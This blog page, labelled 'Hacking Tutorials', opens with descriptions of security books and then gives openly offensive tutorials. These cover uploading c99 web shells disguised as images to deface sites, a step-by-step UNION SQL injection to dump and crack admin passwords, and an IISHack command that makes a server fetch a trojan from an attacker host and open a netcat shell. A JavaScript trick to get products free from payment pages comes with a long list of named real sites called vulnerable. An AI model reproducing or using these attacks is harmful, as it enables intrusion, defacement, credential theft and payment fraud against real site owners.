Ms Windows Support

  • Subscribe to our RSS feed.
  • Twitter
  • StumbleUpon
  • Reddit
  • Facebook
  • Digg
Showing posts with label Hacking Tutorials. Show all posts
Showing posts with label Hacking Tutorials. Show all posts

Saturday, 27 July 2013

Windows 8 Hacks & secrets 2013 !! Preston Gralla

Posted on 06:19 by Unknown

Windows 8 Hacks & secrets 2013

Published: 2013 | ISBN10 1449325750 | 422 Pages | PDF |SIZE 41 MB


Book Description

Windows 8 is quite different than previous Microsoft operating systems, but it’s still eminently hackable. With this book, you’ll learn how to make a variety of modifications, from speeding up boot time and disabling the Lock screen to hacking native apps and running Windows 8 on a Mac. And that’s just the beginning. You’ll find more than 100 standalone hacks on performance, multimedia, networking, the cloud, security, email, hardware, and more. Not only will you learn how to use each hack, you’ll also discover why it works.
 Add folders and other objects to the Start screen 
 Run other Windows versions inside Windows 8 
 Juice up performance and track down bottlenecks 
 Use the SkyDrive cloud service to sync your files everywhere 
 Speed up web browsing and use other PCs on your home network 
 Secure portable storage and set up a virtual private network 
 Hack Windows 8 Mail and services such as Outlook 
 Combine storage from different devices into one big virtual disk 
 Take control of Window 8 setting with the Registr

==========================================================



Read More
Posted in book, hacking, Hacking Tutorials | No comments

Designing BSD Rootkits An Introduction to Kernel Hacking !! Joseph Kong

Posted on 04:58 by Unknown


Designing BSD Rootkits An Introduction to Kernel Hacking

Published: 2007 | ISBN10 1593271425 | 144 Pages | PDF |SIZE 8 MB


Book Description


Though rootkits have a fairly negative image, they can be used for both good and evil. Designing BSD Rootkits arms you with the knowledge you need to write offensive rootkits, to defend against malicious ones, and to explore the FreeBSD kernel and operating system in the process.

Organized as a tutorial, Designing BSD Rootkits will teach you the fundamentals of programming and developing rootkits under the FreeBSD operating system. Author Joseph Kong's goal is to make you smarter, not to teach you how to write exploits or launch attacks. You'll learn how to maintain root access long after gaining access to a computer and how to hack FreeBSD.

Kongs liberal use of examples assumes no prior kernel-hacking experience but doesn't water down the information. All code is thoroughly described and analyzed, and each chapter contains at least one real-world application.

Included:
- The fundamentals of FreeBSD kernel module programming
- Using call hooking to subvert the FreeBSD kernel
- Directly manipulating the objects the kernel depends upon for its internal record-keeping
- Patching kernel code resident in main memory  in other words, altering the kernel's logic while it's still running
- How to defend against the attacks described

=========================================================


Read More
Posted in book, hacking, Hacking Tutorials | No comments

Brute Force Cracking the Data Encryption Standard !! Matt Curtin

Posted on 04:43 by Unknown


Brute Force Cracking the Data Encryption Standard

Published: 2005 | ISBN10 0387201092 | 283 Pages | PDF |SIZE 2 MB


Book Description

In 1996, the supposedly uncrackable US federal encryption system was broken. In this captivating and 

intriguing book, Matt Curtin charts the rise and fall 

of 
DES and chronicles the efforts of those who were determined to master it.

==========================================================


Read More
Posted in book, hacking, Hacking Tutorials | No comments

Hacking for Dummies: test network security !! Stuart McClure

Posted on 04:36 by Unknown

Hacking for Dummies: Test Network Security

Published: 2004 | 387 Pages | PDF |SIZE 10 MB


Book Description

A new edition of the bestselling guide-now updated to cover the latest hacks and how to prevent them!

It's bad enough when a hack occurs-stealing identities, bank accounts, and personal information. But when the hack could have been prevented by taking basic security measures-like the ones described in this book-somehow that makes a bad situation even worse. This beginner guide to hacking examines some of the best security measures that exist and has been updated to cover the latest hacks for Windows 7 and the newest version of Linux.

Offering increased coverage of Web application hacks, database hacks, VoIP hacks, and mobile computing hacks, this guide addresses a wide range of vulnerabilities and how to identify and prevent them. Plus, you'll examine why ethical hacking is oftentimes the only way to find security flaws, which can then prevent any future malicious attacks.

Explores the malicious hackers's mindset so that you can counteract or avoid attacks completely
Covers developing strategies for reporting vulnerabilities, managing security changes, and putting anti-hacking policies and procedures in place

========================================================


Read More
Posted in book, hacking, Hacking Tutorials | No comments

Syngress SQL Injection Attacks & Defense !! Justin Clarke

Posted on 04:22 by Unknown

Syngress SQL Injection Attacks & Defense

Published: 2012 | 576 Pages | ISBN: 1597499633 | PDF | 10MB


Book Description


SQL Injection Attacks and Defense, First Edition: Winner of the Best Book Bejtlich Read Award 
 "SQL injection is probably the number one problem for any server-side application, and this book unequaled in its coverage." -Richard Bejtlich, Tao Security blog 
 SQL injection represents one of the most dangerous and well-known, yet misunderstood, security vulnerabilities on the Internet, largely because there is no central repository of information available for penetration testers, IT security consultants and practitioners, and web/software developers to turn to for help. 
 SQL Injection Attacks and Defense, Second Edition is the only book devoted exclusively to this long-established but recently growing threat. This is the definitive resource for understanding, finding, exploiting, and defending against this increasingly popular and particularly destructive type of Internet-based attack. 
 SQL Injection Attacks and Defense, Second Edition includes all the currently known information about these attacks and significant insight from its team of SQL injection experts, who tell you about: 
 Understanding SQL Injection - Understand what it is and how it works 
 Find, confirm and automate SQL injection discovery 
 Tips and tricks for finding SQL injection within code 
 Create exploits for using SQL injection 
 Design apps to avoid the dangers these attacks 
 SQL injection on different databases 
 SQL injection on different technologies 
 SQL injection testing techniques 
 Case Studies 
 Securing SQL Server, Second Edition is the only book to provide a complete understanding of SQL injection, from the basics of vulnerability to discovery, exploitation, prevention, and mitigation measures. 
 Covers unique, publicly unavailable information, by technical experts in such areas as Oracle, Microsoft SQL Server, and MySQL -including new developments for Microsoft SQL Server 2012 (Denali). 
 Written by an established expert, author, and speaker in the field, with contributions from a team of equally renowned creators of SQL injection tools, applications, and educational materials.

Reviews:

-------------------------------------------------------------------------------
"SQL injection is probably the number one problem for any server-side application, and this book unequaled in its coverage." 
--Richard Bejtlich, Tao Security blog 

"The most stunningly impactful attacks often leverage SQL Injection vulnerabilities. This book has everything you need to fight back, from applying the core fundamentals to protecting emerging technologies against such attacks. Keep it by your bedside and distribute it within your business." 
--Nitesh Dhanjani, Executive Director at Ernst & Young LLP
-------------------------------------------------------------------------------

About the Author:

-------------------------------------------------------------------------------
Justin Clarke (CISSP, CISM, CISA, MCSE, CEH) is a cofounder and executive director of Gotham Digital Science, based in the United Kingdom. He has over ten years of experience in testing the security of networks, web applications, and wireless networks for large financial, retail, and technology clients in the United States, the United Kingdom and New Zealand.

============================================================


Read More
Posted in book, hacking, Hacking Tutorials | No comments

Tuesday, 7 August 2012

Hack Website By Uploding shell – Tutorial

Posted on 22:27 by Unknown

Google Dork : intitle:Powered By phUploader 

Go to Google.com and enter this DOrk, see serach results 
Exploit URL : 
http://{site.comt}/ path/upload.php
or 
http://site.com/upload.php

select any website and upload your file there 
website allow to upload .jpg .png .gif anf .png files only
anyway you can upload your deface in .jpg and mirrOr website like 
zone-h accept it as defcaement, if want to upload a shell then upload as 
shell.php.jpg

after uploading your file you'll got a message 
Your file(s) have been uploaded!


see the Example Link Below this message For view Your uploaded File

Live Demo ~ http://Victimsite.com/phUploader.php

Uploaded File ~ http://www.Victimsite.com/uploads/1321616908.jpg

Download Shell
Read More
Posted in Hacking Tutorials | No comments

How To Upload Shell and Deface Website – Tutorial

Posted on 22:16 by Unknown
What we need:

1-A Shell (Will be provided)


2-A website vulnerable to SQLi


3-Image or File upload area on that Vulnerable website

So firstly download the shell here.

Download

What is Shell ?

A shell script is a script written for the shell, or command line interpreter, of an operating system. It is often considered a simple domain-specific programming language. Typical operations performed by shell scripts include file manipulation, program execution, and printing text.
This is a plain c99 shell, BUT it is Undetected so you should not get a warning from a anti virus if you download it. (update: not Undetected anymore )

I am not going to explain SQLi just how to deface.

Sql Tut- http://sumitcrackzone.blogspot.in/2012/08/how-to-hack-website-with-sql-injection.html

So now go get yourself a vulnerable site, hack it and get the Admin Login details and get the Admin Page address.

Now login to the admin page with the admin details you got.

Go through the admin page until you find a place where you can upload a picture (Usually a picture).

Now you have to upload the shell. Right if you don’t get an error it is all good.

Now to find the shell

Go through the site until you find any image and if you are using firefox Right

- Click on it and “Copy Image Location”

Make a new tab and paste it there.

It will probably look something like this:

http://www.example.com/images/photonamehere.jpg

So now that we know that change “/photonamehere.jpg” to “/c99ud.php.jpg” (Without Qoutes)

Now a page will come up looking like this:


Does probably not look like that but will look similar.

Now you have access to all the files on the site
What you want to do is now,
Find index.php or whatever the main page is, and replace it with your HTML code for your Deface Page.

Then you can either delete all the other files OR (and I recommend this) Let it redirect to the main page.

Keep in mind:

• Change Admin Username and Password

•The people have FTP access so you need to change that Password too .

•Always use a Proxy or VPN
Read More
Posted in Hacking Tutorials | No comments

How To Hack Web Servers - tutorial

Posted on 22:08 by Unknown

Hacking Tool: IISHack.exe

iishack.exe overflows a buffer used by IIS http daemon,
allowing for arbitrary code to be executed.
c:\ iishack www.yourtarget.com 80 www.yourserver.com/thetrojan.exe
www.yourtarget.com is the IIS server you're hacking, 80 is the port its listening on,
 www.yourserver.com is some webserver with your trojan or custom script (your own, or another), and /thetrojan.exe is the path to that script.

"IIS Hack" is a buffer overflow vulnerability exposed by the way IIS handles requests with .HTR extensions.
A hacker sends a long URL that ends with ".HTR". IIS interprets it as a file type of HTR and invokes the ISM.DLL to handle the request.

Since ISM.DLL is vulnerable to a buffer overflow, a carefully crafted string can be executed in the security context of IIS,

which is privileged. For example, it is relatively simple to include in the exploit code a sequence of commands that will open a TCP/IP connection,
download an executable and then execute it.
This way,

any malicious code can be executed.
A sample exploit can be constructed as shown below:
To hack the target site and attacker's system running a web server can use iishack.exe and ncx.exe.
To begin with, the ncx.exe is configured to run from the root directory.
IIShack.exe is then run against the victim site.
c:\>iishack.exe  80 /ncx.exe
The attacker can then use netcat to evoke the command shell
c:\>nc  80
He can proceed to upload and execute any code of his choice and maintain a backdoor on the target site.


IPP Buffer Overflow Countermeasures

Install latest service pack from Microsoft.
Remove IPP printing from IIS Server
Install firewall and remove unused extensions
Implement aggressive network egress filtering
Use IISLockdown and URLScan utilities
Regularly scan your network for vulnerable servers
Without any further explanation,
the first countermeasure is obviously to install the latest service packs and hotfixes.
As with many IIS vulnerabilities, the IPP exploit takes advantage of a bug in an ISAPI DLL that ships with IIS 5 and is configured by default to handle requests for certain file types.
This particular ISAPI filter resides in C: \WINNT\System32\msw3prt.dll and provides Windows 2000 with support for the IPP. If this functionality is not required on the Web server,
the application mapping for this DLL to .printer files can be removed (and optionally deleting the DLL itself) in order to prevent the buffer overflow from being exploited.
This is possible because the DLL will not be loaded into the IIS process when it starts up.
In fact, most security issues are centered on the ISAPI DLL mappings,
making this one of the most important countermeasure to be adopted when securing IIS.
Another standard countermeasure that can be adopted here is to use a firewall and remove any extensions that are not required.
Implementing aggressive network egress can help to a certain degree.
With IIS, using IISLockdown and URLScan - (free utilities from Microsoft) can ensure more protection and minimize damage in case the web server is affected.
Microsoft has also released a patch for the buffer overflow,
 but removing the ISAPI DLL is a more proactive solution in case there are additional vulnerabilities that are yet to be found with the code.


ISAPI DLL Source disclosures

Microsoft IIS 4.0 and 5.0 can be made to disclose fragments of source code which should otherwise be in accessible.
This is done by appending "+.htr" to a request for a known .asp (or .asa, .ini, etc) file.
appending this string causes the request to be handled by ISM.DLL, which then strips the '+.htr' string and may disclose part or all of the source of the .asp file specified in the request.
IIS supports several file types that require server-side processing. When a web site visitor requests a file of one of these types, an appropriate filter DLL processes it. Vulnerability exists in ISM.DLL,
the filter DLL that processes .HTR files. HTR files enable remote administration of user passwords.
HTR files are scripts that allow Windows NT password services to be provided via IIS web servers. Windows NT users can use .HTR scripts to change their own passwords, and administrators can use them to perform a wide array of password administration functions.
HTR is a first-generation advanced scripting technology that is included in IIS 3.0, and still supported by later versions of IIS for backwards compatibility. However, HTR was never widely adopted, and was superceded by Active Server Pages (ASP) technology introduced in IIS 4.0.

Attack Methods


Exploit / Attack Methodology
By making a specially formed request to IIS, with the name of the file and then appending around 230 + " %20 " (these represents spaces) and then appending " .htr " this tricks IIS into thinking that the client is requesting a " .htr " file . The .htr file extension is mapped to the ISM.DLL ISAPI Application and IIS redirects all requests for .htr resources to this DLL.

ISM.DLL is then passed the name of the file to open and execute but before doing this ISM.DLL truncates the buffer sent to it chopping off the .htr and a few spaces and ends up opening the file whose source is sought. The contents are then returned. This attack can only be launched once though, unless the web service started and stopped. It will only work when ISM.DLL first loaded into memory.

"Undelimited .HTR Request" vulnerability: The first vulnerability is a denial of service vulnerability. All .HTR files accept certain parameters that are expected to be delimited in a particular way. This vulnerability exists because the search routine for the delimiter isn't properly bounded. Thus, if a malicious user provided a request without the expected delimiter, the ISAPI filter that processes it would search forever for the delimiter and never find it.

If a malicious user submitted a password change request that lacked an expected delimiter, ISM.DLL, the ISAPI extension that processes .HTR files, would search endlessly for it. This would prevent the server from servicing any more password change requests. In addition, the search would consume CPU time, so the overall response of the server might be slowed.
The second threat would be more difficult to exploit. A carefully-constructed file request could cause arbitrary code to execute on the server via a classic buffer overrun technique. Neither scenario could occur accidentally. This vulnerability does not involve the functionality of the password administration features of .HTR files.

".HTR File Fragment Reading" vulnerability: The ".HTR File Fragment Reading" vulnerability could allow fragments of certain types of files to be read by providing a malformed request that would cause the. HTR processing to be applied to them. This vulnerability could allow a malicious user to read certain types of files under some very restrictive circumstances by levying a bogus .HTR request. The ISAPI filter will attempt to interpret the requested file as an .HTR file, and this would have the effect of removing virtually everything but text from a selected file. That is, it would have the effect of stripping out the very information that is most likely to contain sensitive information in .asp and other server-side files.

The .htr vulnerability will allow data to be added, deleted or changed on the server, or allow any administrative control on the server to be usurped. Although .HTR files are used to allow web-based password administration, this vulnerability does not involve any weakness in password handling.
"Absent Directory Browser Argument" vulnerability: Among the default HTR scripts provided in IIS 3.0 (and preserved on upgrade to IIS 4.0 and IIS 5.0) were several that allowed web site administrators to view directories on the server. One of these scripts, if called without an expected argument, will enter an infinite loop that can consume all of the system's CPU availability, thereby preventing the server from responding to requests for service.
Read More
Posted in Hacking Tutorials | No comments

How To Hack website With SQL Injection : Full Tutorial

Posted on 11:54 by Unknown

I'm posting this here coz this tut explains everything step by step. but most of the sql tuts ends when we find the password hash. So newbees dnt know wat to do after that. In this tut i'm gonna explain how to deface a website from scratch hope you fill find this usefull....

If you find this tut usefull please post a comment....

1) FINDING THE TARGET AND GETTING THE ADMIN PASSWORD


First we must find our target website to do that you can use this "dorks".
I'll give some dorks here copy anyone of it and paste it in google and search.
Code:
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=

you can find lots of dorks here..(use them without the " " marks)
Code:
Click Here To Download

1). Check for vulnerability

Let's say that we have some site like this

http://www.site.com/news.php?id=5

Now to test if is vulrnable we add to the end of url ' (quote),

and that would be http://www.site.com/news.php?id=5'

so if we get some error like
"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc..."
or something similar

that means is vulrnable to sql injection

2). Find the number of columns

To find number of columns we use statement ORDER BY (tells database how to order the result)

so how to use it? Well just incrementing the number until we get an error.

http://www.site.com/news.php?id=5 order by 1/* <-- no error
http://www.site.com/news.php?id=5 order by 2/* <-- no error
http://www.site.com/news.php?id=5 order by 3/* <-- no error
http://www.site.com/news.php?id=5 order by 4/* <-- error (we get message like this Unknown column '4' in 'order clause' or something like that)

that means that the it has 3 columns, cause we got an error on 4.

3). Check for UNION function


With union we can select more data in one sql statement.
so we have
http://www.site.com/news.php?id=5 union all select 1,2,3/* (we already found that number of columns are 3 in section 2). )

if we see some numbers on screen, i.e 1 or 2 or 3 then the UNION works

4). Check for MySQL version


http://www.site.com/news.php?id=5 union all select 1,2,3/* NOTE: if /* not working or you get some error, then try --
it's a comment and it's important for our query to work properly.

let say that we have number 2 on the screen, now to check for version we replace the number 2 with @@version or version() and get someting like 4.1.33-log or 5.0.45 or similar.

it should look like this
http://www.site.com/news.php?id=5 union all select 1,@@version,3/*

if you get an error "union + illegal mix of collations (IMPLICIT + COERCIBLE) ..."

i didn't see any paper covering this problem, so i must write it

what we need is convert() function

i.e.

 http://www.site.com/news.php?id=5 union all select 1,convert(@@version using latin1),3/*

or with hex() and unhex()

 i.e.

http://www.site.com/news.php?id=5 union all select 1,unhex(hex(@@version)),3/*

and you will get MySQL version

5). Getting table and column name
well if the MySQL version is < 5 (i.e 4.1.33, 4.1.12...) <--- later i will describe for MySQL > 5 version.
we must guess table and column name in most cases.

common table names are: user/s, admin/s, member/s ...

common column names are: username, user, usr, user_name, password, pass, passwd, pwd etc...

i.e would be

http://www.site.com/news.php?id=5 union all select 1,2,3 from admin/* (we see number 2 on the screen like before, and that's good )

we know that table admin exists...


now to check column names.


http://www.site.com/news.php?id=5 union all select 1,username,3 from admin/* (if you get an error, then try the other column name)

we get username displayed on screen, example would be admin, or superadmin etc...

now to check if column password exists

http://www.site.com/news.php?id=5 union all select 1,password,3 from admin/* (if you get an error, then try the other column name)

we seen password on the screen in hash or plain-text, it depends of how the database is set up

i.e md5 hash, mysql hash, sha1...

now we must complete query to look nice

for that we can use concat() function (it joins strings)

i.e

http://www.site.com/news.php?id=5 union all select 1,concat(username,0x3a,password),3 from admin/*

Note that i put 0x3a, its hex value for : (so 0x3a is hex value for colon)

(there is another way for that, char(58), ascii value for : )


http://www.site.com/news.php?id=5 union all select 1,concat(username,char(58),password),3 from admin/*

now we get dislayed username:password on screen, i.e admin:admin or admin:somehash

when you have this, you can login like admin or some superuser

if can't guess the right table name, you can always try mysql.user (default)

it has user i password columns, so example would be

http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,password),3 from mysql.user/*

6). MySQL 5

Like i said before i'm gonna explain how to get table and column names
in MySQL > 5.

For this we need information_schema. It holds all tables and columns in database.

to get tables we use table_name and information_schema.tables.

i.e

http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables/*

here we replace the our number 2 with table_name to get the first table from information_schema.tables

displayed on the screen. Now we must add LIMIT to the end of query to list out all tables.

i.e

http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 0,1/*

note that i put 0,1 (get 1 result starting from the 0th)

now to view the second table, we change limit 0,1 to limit 1,1

i.e

http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 1,1/*

the second table is displayed.

for third table we put limit 2,1

i.e

http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 2,1/*

keep incrementing until you get some useful like db_admin, poll_user, auth, auth_user etc...

To get the column names the method is the same.

here we use column_name and information_schema.columns

the method is same as above so example would be


http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 0,1/*

the first column is diplayed.

the second one (we change limit 0,1 to limit 1,1)

ie.


http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 1,1/*

the second column is displayed, so keep incrementing until you get something like

username,user,login, password, pass, passwd etc...

if you wanna display column names for specific table use this query. (where clause)

let's say that we found table users.

i.e

http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns where table_name='users'/*

now we get displayed column name in table users. Just using LIMIT we can list all columns in table users.

Note that this won't work if the magic quotes is ON.

let's say that we found colums user, pass and email.

now to complete query to put them all together

for that we use concat() , i decribe it earlier.

i.e


http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,pass,0x3a,email) from users/*

what we get here is user:pass:email from table users.

example: admin:hash:whatever@blabla.com

** if you are too lazy for doing above stuff you can use tools they will do all the job:
1) Exploit scanner (this will find vulnerable websites)
Code:

Click Here To Download

2) SQLi helpper (this tool will do all the injecting job and get you the pass or hash)
Code:

Click Here To Download

*** use the tools only if you are new to hacking. Do it manually thats the thrill and that is real hacking. When you do it manually you will understand the concept.

in some websites you can directly see the password. but most of the websites encrypt them using MD5. so u hav to crack the hash to get the password. to crack the password there are three ways
1) check the net whether this hash is cracked before:
Code:

Click Here To Download

2) crack the password with the help of a site:
Code:

Click Here To Download 
Click Here To Download 

3) use a MD5 cracking software:
Code:

Click Here To Download 
Password = OwlsNest

2) DEFACING THE WEBSITE

after getting the password you can login as the admin of the site. But first you have to find the admin login page for the site. there r three methods to find the admin panel.
1) you can use an admin finder website:
Code:

Click Here To Download 

2) you can use an admin finder software:
Code:

Click Here To Download 

after logging in as the admin you can upload photos to the site. so now you are going to upload a shell into the site using this upload facility.

dowload the shell here(shells are php scripts which affects websites so it will be detected as trojans but no need to worry i take the responsibility):

Code:
Click Here To Download 
extract it you will get a c99.php upload it.
some sites wont allow you to upload a php file. so rename it as c99.php.gif
then upload it.

after that go to http://www.site.com/images (in most sites images are saved in this dir but if you cant find c99 there then you have to guess the dir)
find the c99.php;.gif and click it..
now you can see a big control pannel....
now you can do what ever you want to do...
search for the index.html file and replace it with your own file. so if any one goes to that site they will see your page....

after doing this click logout.... thats it you are done..
Read More
Posted in Hacking Tutorials | No comments

Saturday, 21 July 2012

Paypal Hack By JavaScript

Posted on 22:22 by Unknown
First search any vulnerable website and then paste the below script in the address bar and hit enter

javascript:top.location=document.getElementsByName('return')[0].value; javascript:void(0);


After hitting enter,enjoy the free product

Here is the most updated list of website which are vulnerable to this javascript;


http://www.businesslistsforsale.com/Specialty-Lists.shtml
http://freewaretools.net/search/“this-order-button-requires-a-javascript-enabled-browser-submitter/
http://freewaretools.net/search/this-order-button-requires-a-javascript-enabled-browser-instant-download/
http://freewaretools.net/search/this-order-button-requires-a-javascript-enabled-browser-seo/
http://www.orderproductsdirect.com/Instantdownload.htm
http://www.wewritequalityarticles.com/
http://www.buildmeacashblog.com/
http://www.lynkstatrak.com/samples-1.htm
http://ready-made-income-sites-at.yourglobalcompany.com/
http://www.golfersdream.com/advertising_ezine.htm
http://www.claypals.net
http://www.angelfire.com/ab7/celebrities/CelebritiesMailingList.htm
http://doitupamerica.com/singlempthrees/
http://www.singlelives.com/ama-ad-pacs-and-single-ad-prices.htm
http://www.egamingsupply.com/cheap-power-leveling/ffxi
http://www.dxproscripts.com/
http://www.rduanewilling.com/order.htm
http://treasuresignsandsymbols.treasure-legend.com/
http://hostingwebserver.com/extras.html
http://www.bugs-n-blooms.com/topsite/girlsroomdecortopads.htm
http://mall.topcities.com/webtools.htm
http://minisitesunlimited.com/
http://www.rphinc.net/
http://www.productcreationpro.com/product-only-no-frills.htm
http://blairin.com/music.html
http://www.softwarewarrioress.com/newbies.html
http://www.2nd-income-solutions.com/Advertising_Rates_Ezine.htm
http://my1040.ws/registration.htm
http://www.buyfanpagetraffic.com/
http://myforexedge.com/
http://www.doctorisin.net/
http://www.peigifts.com/
http://www.alternative-spiritual-healing.com/self-help-store.html
http://www.cbsqueezevideos.com/
http://www.magicities.com/streetmagic/
http://www.digitalproductscenter.com/videos/plr-cash-machine/index.html
http://www.stuccotools.com/diana-gun-hopper/
http://www.wittytemplates.com/build_your_ebay_empire2.html
http://lifechurchmv.com/audio/
http://ironoverload.info/ironichealth/
http://resilient2disaster.com/hwy/i90.php?y-browser-n95
http://www.dubai-mobiles.net/ebooks.htm
http://www.bensonawong.com/
http://businessuncommon.com/ebay3/
http://www.mindpower4you.com/publicspeakingaudio.html
http://turnbuckleman03a.com/imagecreator/
http://www.yourmodern.com/business.html
http://www.lightsoflove.us/LLAW/vol105.php
http://thegamblinghouse.net/years-scroll-array-items-javascript/
http://www.pitbullcoaching.com/
http://instantnichewebsite.com/
http://www.cmkoch.biz/postingads.html
http://www.matthewandrobyn.com/matts music/R2C.html
http://www.z2wealthsystem.com/TwitterVideoTutorials/
http://www.johnmelanson.info/ResourceExplosion-Web/Index.html
http://www.johnkoehler.com/payments.htm
http://www.cdproductsonline.com/computers/sqpage/index.htm
http://www.auctionkits.com/kits/kit-b/index.htm
http://www.eternity-yoga.com/yoga-workshops.html
http://www.manuscriptreviews.com/manuscript-reviews-services.html
http://tylersanford.com/nace-internet-browsers-downloads/
http://www.pleazz.com/craigs/PR_6_Backlinks.htm
http://www.mastersofnewthought.com/gwaysignup.html
http://utilityspot.com/signup.htm
http://www.domaincity.ws/
http://thebestreps.com/gonzo-dd-wrt-enable-dhcp-with-option-150/
http://rumblesfromthejungle.com/gmkt_v1.htm
http://www.jonathanhendricks.com/webmaster/
http://www.earneasymoneynow.com/webtools/webtools.htm
http://karinsbutik.com/fortnight-bayview-landing-in-virginia/
http://www.snouthouse.com/order.htm
http://mothersandmaidens.com/clank-javascript-pop-sound/
http://www.real-freedom.com/OrigEprods/index.htm
http://knightthunder.com/listcleaner.php
http://www.mindblowingmindreading.com/findout.php
http://www.globaltechmktg.com/adassassin.html
http://www.videoepidemic.com/
http://www.thecossgroup.com/1/Auto/index.html
http://www.ebooks-made-easy.com/articlemachine/
http://chrisblackburn.com/culos-how-to-enable-regedit-services-in-win-xp/
http://www.9.77plr.com/NPWT.html
http://www.sfielite.com/sfiteamcoop.html
http://www.jcjmarketing.org/ordering.html
http://www.dawesrolls.com/dawes/INDEXonCD.aspx
http://www.psychotherapy-for-hypnotists.com/
http://www.qballcafe.com/
http://www.100hypnoticsalestips.com/
http://www.emailprocessinghomebiz.com/
http://www.resellerproducts.com/SocialMediaProfits/index.html
http://www.allthatwomenwant.com/recipecollection.htm
http://www.socialtrafficdetonator.com/
http://www.spiritsinpeace.com/richard-doiron/A-Winters-Soliloquy.html
http://www.trainmycat.com/order.htm
http://grinderswitch.com/
http://www.adsensetracker.info/
http://www.rverscorner.com/painless.html
http://www.militaryebooks.com/self-defense.php
http://www.desktop-wealth.com/soft/instant/ism/ism.htm
http://www.credit-improve.com/
http://www.ropercenter.uconn.edu/center/mitofsky_overview.html
http://coralarquitectura.cat/kombucha-pheromones-perfumes-buy-verified-byvisa-enabled/
http://www.linkpopularity.ws/
http://www.6figuremarketing.com/barrs/audio.html
http://www.woothosting.com/HOME/woot-hosting-templates-for-sale.htm
http://ideal-deals-resell-package.com/tr-order.htm
http://www.amazingmindreading.com/findout.php
http://inkingdaze.com/stu-fruit-spanish-abc-order/
http://jollyobama.com/obama_jockey_standup.html
http://www.aysdesigns.com/payments.html
http://www.becoming.net/mks/eebve.html
http://www.testedtough.com/
http://www.concentus-tech.com/software.html
http://www.rodgerhyatt.com/ens/
http://stopthecop.com/products.html
http://www.ebookstarter.com/register/purchase2.php
http://www.yourmodern.com/power.html
http://www.traildustmagazine.net/
http://twitter-automation-at.freeincomesite.com/
http://www.govtauctionfinder.com/
http://www.danbeal.com/2-buck-ad-sale.htm
http://www.whispersfromtheuniverse.com/
http://tatimages.com/ButterflyTattoosBlack/
http://appfactoryllc.com/des-autoclick-skate-beach/
http://www.weetagalong.com/
http://www.fortunesfromforums.com/ordernow.html
http://www.isnake.net/cd.htm
http://operations-guide.com/404tips/
http://www.netemailspider.com/buy_now.htm
http://www.peruviannaturistasmedicines.com/beauty_tips_female/aguaje_properties_hips_breasts_perfect_body_beauty.php
http://paylockgenerator.com/plg_order.html
http://shop.9-99.us/products/ccshadow.html
http://christians-r-us.net/kit.php
http://www.cnc-academy.com/cnc-programming-jobs.htm
http://cemeteryheadstones.org/
http://dnmoola.com/
http://forumnichegoldmine.com/
http://www.gambling-ebooks.info/mindyourownpokerbusiness.htm
http://trishas-creations.info/Notecards/
http://www.qqday.net/
http://webtoolskit.net/order1.html
http://avolonage.com/newproduct/socialnetwork/index.htm
http://www.wealth-ambition.com/mim/mentors-in-motion.htm
http://www.stuccotools.com/stucco-sprayer/
http://www.marketeknowledgy.com/kmt/
http://easyseductionsecrets.com/
http://www.savegainstax.com/interviewwiththepros/
http://www.websiteheaders.us/
http://www.whycredit.info/order.html
http://advancedinternetstudycourse.com/PriceTest/
http://living-4-life.info/healthy-you/index.html
http://creditcardcrazy.com/join2.html
http://www.web-biz-solutions.com/ebookstore/ebooks/order1.html
http://www.gratitudebook.com/
http://affiliateset.com/a-set-order-page1.html
http://newcreditfiletoday.com/
http://www.auctionkits.com/kits/kit-a/index.htm
http://video-squeeze-templates.com/
http://businessuncommon.com/plrmega/
http://www.desktop-wealth.com/soft/instant/affiliatemasker/ialm.htm
http://www.businesslistsforsale.com/US_Consumer_State_List_.shtml
http://www.spiritsinpeace.com/carolknepper/humanitarian-poetry.html
http://www.militaryebooks.com/military-fitness.php
http://www.softwarewarrioress.com/internet_marketing.html
http://traildustmagazine.net/bkissues.html
http://bensonawong.com/prayerandhope.html
http://www.weetagalong.com/test.htm
http://www.3.77plr.com/SecretsofSuccessEaster2010.html
http://www.ebooks-made-easy.com/membersite/
http://www.spiritsinpeace.com/carolknepper/nature-poems.html
http://www.weetagalong.com/features.htm
http://www.peruviannaturistasmedicines.com/treatment/insomnia_natural_treatments.php
http://businessuncommon.com/maillist/
http://www.adsensetracker.com/
http://www.jytra.com/low-cost-cad-software.html
http://www.cdproductsonline.com/turnkey/48websites/index.htm
http://hypnosisdepot.com/stage.htm
http://hypnosisdepot.com/ebooks.htm
http://www.ebooksgala.com/ebay8/eBayClassifiedAd.htm
http://www.businesslistsforsale.com/Specialty-Lists.shtml
http://www.wewritequalityarticles.com/
http://www.orderproductsdirect.com/Instantdownload.htm
http://ready-made-income-sites-at.yourglobalcompany.com/
http://wiriagar.com/waikoloa-scroll-iframe-with-javascript/
http://www.buildmeacashblog.com/
http://treasuresignsandsymbols.treasure-legend.com/
http://hostingwebserver.com/extras.html

Note :- if u face any problem in this post , u sent ur problem by comment
Read More
Posted in Hacking Tutorials | No comments
Older Posts Home
Subscribe to: Posts (Atom)

Popular Posts

  • Designing BSD Rootkits An Introduction to Kernel Hacking !! Joseph Kong
    Designing BSD Rootkits An Introduction to Kernel Hacking Published: 2007 | ISBN10 1593271425 | 144 Pages | PDF |SIZE 8 MB Book Description T...
  • LENOVO ONE KEY RECOVERY PROBLEM SOLUTION FOR WINDOWS 8
    LENOVO ONE KEY RECOVERY  PROBLEM SOLUTION FOR WINDOWS 8 NOTE- this solution only for windows 8 lenovo pc+laptop. or if ur recovery not work ...
  • Hacking for Dummies: test network security !! Stuart McClure
    Hacking for Dummies: Test Network Security Published: 2004 | 387 Pages | PDF |SIZE 10 MB Book Description A new edition of the bestselling g...
